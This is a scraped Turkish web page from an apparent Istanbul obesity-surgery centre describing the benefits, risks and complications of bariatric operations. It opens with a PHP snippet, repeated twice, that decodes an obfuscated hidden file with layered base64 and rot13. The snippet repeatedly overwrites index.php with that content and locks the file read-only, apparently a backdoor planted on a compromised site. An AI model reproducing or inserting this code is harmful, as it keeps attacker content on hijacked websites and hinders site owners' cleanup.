$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Faydaları Riskleri Komplikasyonları - İstanbul Obezite Cerrahisi Merkezi

Skip links

Faydaları Riskleri Komplikasyonları

Obezite cerrahisiyle hastaların sağlık durumlarında aşağıdaki düzelmeler beklenebilir:

– Yüksek tansiyon düzelir. Hastaların yüzde 70’i tansiyon ilaçlarını tamamen kesmektedir.

– Kan kolesterolü düzelir. Hastaların yüzde 80’inde kolesterol seviyelerinin düştüğü bildirilmiştir. Ameliyattan 2-3 ay sonra değerler normale dönmektedir.

– Kalp hastalığı riski düşer.

– Tip II diyabet tanısı almış hastaların çok azının ilaç almasına gerek kalmaktadır. Çoğunluk insülin kullanımını bırakacak düzeyde iyileşme gösterir.

– Diyabet sınırındaki hastalarda şeker metabolizması genellikle tamamen düzelir.

– Astım atakları büyük oranda azalır, bazı hastalarda tamamen düzelir.

– Solunum problemleri ameliyattan sonraki birkaç ay içinde düzelir. Pek çok hasta solunum problemleri yüzünden bırakmak zorunda kaldıkları aktivitelere ve normal rutinlerine dönebilir.

– Uyku apnesi gibi obeziteyle ilişkili uyku bozuklukları ortadan kalkar.

– Asit reflü hastalığı ortadan kalkar.

Obezite Cerrahisinin Dezavantajları ve Riskleri:

Obezite cerrahisi temelde iki grup operasyondan oluşmaktadır. Bunlardan biri olan kısıtlayıcı ameliyatların en sık uygulananı silikon gastrik band operasyonlarıdır. Bu ameliyatlarda en sık görülen sorunlar silikon da olsa bir yabancı cisim olan banda bağlı sorunlardır. Band kayması, port enfeksiyonları ve bandın mide duvarını aşındırarak mideye girmesi, yani migrasyon bunların en önemlileridir.

Diğer grup ameliyatlar ise mide hacmini küçültmelerine ek olarak sindirim sisteminin doğal akışını da değiştirerek gıda emilimini azaltan ameliyatlardır. En önemli tipi Roux-en-Y gastrik bypass olan bu malabsorbtif ameliyatlarda karşılaşılan sorunlar genelde nutrisyonel, yani besin maddelerinin emiliminin azalmasına bağlı sorunlardır. Gastrik bypass cerrahisi büyük olasılıkla çeşitli yan etkiler oluşturacaktır. Cerrahi birçok metabolik aktiviteyle de etkileşir ve bazı problemlere yol açabilir. Bunun da ötesinde, yüsek maliyetli bir seçenektir ve özel sağlık sigortaları tarafından kapsanmamaktadır. Bizzat cerrahinin dezavantajları ise şunlardır:

-Üriner enfeksiyonlarda artma

-Kabızlık veya barsak tıkanıklığı

-Mide çıkımının tıkanması. Ameliyat sonrasında mide çıkımı oldukça daraltılmaktadır. İyi çiğnenmeyen gıdalar burada tıkanıklık yaratmaya müsaittir. Çıkımdan daha büyük her lokma tıkanıklık riski taşır.

-Kronik besin eksiklikleri

-Vitamin ve mineral eksiklikleri

-Bulantı

-Barsak alışkanlıklarında değişiklik

-Saç dökülmesi

-Kas kitlesinde azalma

-Safra kesesi taşları ve ameliyat yeri fıtıkları oluşumu

-Cerrahinin geri dönüştürülmesinin neredeyse imkansız oluşu

-Ölüme kadar varabilen bir takım ciddi komplikasyon riskleri

Kısaca, obezite cerrahisinde beklenmesi gereken riskler iki grupta incelenebilir. Bunlardan biri, bu ameliyatlara özel olmayıp, her türlü ameliyat için geçerli olan kanama, organ yaralanması, enfeksiyon, emboli, solunum ve kalp problemleri gibi sorunlardır. Diğerleri ise, bu ameliyatlara özel sorunlardır. Bunların en ciddisi mide bandında migrasyon, sleeve gastrektomi ve bypassta ise stapler hattı kaçakları ve darlıklardır. Şükür ki, uygun cerrahi teknik ve ekipmanla bu riskler % 1-4 kadar düşük oranlarda görülmektedir.

Bitnami